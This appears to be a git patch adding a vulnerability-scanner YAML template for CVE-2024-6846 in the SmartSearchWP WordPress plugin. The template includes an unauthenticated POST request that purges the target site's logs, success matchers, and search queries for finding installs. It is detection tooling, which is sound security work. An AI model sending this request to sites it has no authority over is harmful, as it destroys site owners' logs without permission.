From 508c7deff8b3cac27e6bf153c198dc02941a1aab Mon Sep 17 00:00:00 2001 From: Kazgangap Date: Fri, 6 Sep 2024 02:07:15 +0300 Subject: [PATCH 1/2] add CVE-2024-6846 --- http/cves/2024/CVE-2024-6846.yaml | 38 +++++++++++++++++++++++++++++++ 1 file changed, 38 insertions(+) create mode 100644 http/cves/2024/CVE-2024-6846.yaml diff --git a/http/cves/2024/CVE-2024-6846.yaml b/http/cves/2024/CVE-2024-6846.yaml new file mode 100644 index 0000000000..4ec71d445b --- /dev/null +++ b/http/cves/2024/CVE-2024-6846.yaml @@ -0,0 +1,38 @@ +id: CVE-2024-6846 + +info: + name: SmartSearchWP <= 2.4.4 - Unauthenticated Log Purge + author: s4e-io + severity: medium + description: | + The Chatbot with ChatGPT WordPress plugin before 2.4.5 does not validate access on some REST routes, allowing for an unauthenticated user to purge error and chat logs. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2024-6846 + - https://wpscan.com/vulnerability/d48fdab3-669c-4870-a2f9-6c39a7c25fd8/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-6846 + metadata: + vendor: webdigit + product: smartsearchwp + framework: wordpress + publicwww-query: "/wp-content/plugins/smartsearchwp" + tags: wpscan,cve,cve2024,wp-plugin,smartsearchwp,chatgpt + +http: + - raw: + - | + POST /wp-json/wdgpt/v1/purge-error-logs HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"months":"1"} + + matchers: + - type: dsl + dsl: + - 'contains_all(body,"success","true","1 months purged successfully")' + - 'contains(content_type,"application/json")' + - 'status_code == 200' + condition: and From 2579f153d4b7f495862d7e3af2f8ccb1442e3f8a Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 8 Sep 2024 22:26:28 +0400 Subject: [PATCH 2/2] Update CVE-2024-6846.yaml --- http/cves/2024/CVE-2024-6846.yaml | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/http/cves/2024/CVE-2024-6846.yaml b/http/cves/2024/CVE-2024-6846.yaml index 4ec71d445b..0fac0ee6a8 100644 --- a/http/cves/2024/CVE-2024-6846.yaml +++ b/http/cves/2024/CVE-2024-6846.yaml @@ -7,18 +7,21 @@ info: description: | The Chatbot with ChatGPT WordPress plugin before 2.4.5 does not validate access on some REST routes, allowing for an unauthenticated user to purge error and chat logs. reference: - - https://nvd.nist.gov/vuln/detail/CVE-2024-6846 - https://wpscan.com/vulnerability/d48fdab3-669c-4870-a2f9-6c39a7c25fd8/ + - https://nvd.nist.gov/vuln/detail/CVE-2024-6846 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N cvss-score: 5.3 cve-id: CVE-2024-6846 metadata: + max-request: 1 + verified: true vendor: webdigit product: smartsearchwp framework: wordpress publicwww-query: "/wp-content/plugins/smartsearchwp" - tags: wpscan,cve,cve2024,wp-plugin,smartsearchwp,chatgpt + fofa-query: body="/wp-content/plugins/smartsearchwp" + tags: wpscan,cve,cve2024,wp,wordpress,wp-plugin,smartsearchwp,chatgpt http: - raw: @@ -32,7 +35,7 @@ http: matchers: - type: dsl dsl: - - 'contains_all(body,"success","true","1 months purged successfully")' + - 'contains_all(body,"success","true", "purged successfully")' - 'contains(content_type,"application/json")' - 'status_code == 200' condition: and